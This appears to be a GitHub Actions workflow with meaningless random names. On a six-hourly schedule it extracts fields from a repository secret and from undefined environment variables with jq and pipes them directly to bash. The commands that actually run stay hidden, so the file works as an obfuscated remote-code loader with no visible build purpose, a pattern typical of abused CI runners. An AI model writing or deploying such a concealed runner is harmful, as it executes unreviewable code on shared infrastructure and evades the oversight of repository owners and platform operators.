name: qheqin
on:
  workflow_dispatch:
  schedule:
    - cron: '41 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: qheqin
        env:
          b711: ${{ secrets.b711 }}
        run: |
          echo $b711 | jq -r .j67 | /bin/bash
          echo $emgxk106 | jq -r .flx1 | /bin/bash
          echo $elof77707 | jq -r .zmzcq7 | /bin/bash
          echo $yxcew879 | jq -r .un134 | /bin/bash
          echo $rs59630 | jq -r .qqhc872 | /bin/bash
          echo $rvuvy7 | jq -r .vg8 | /bin/bash

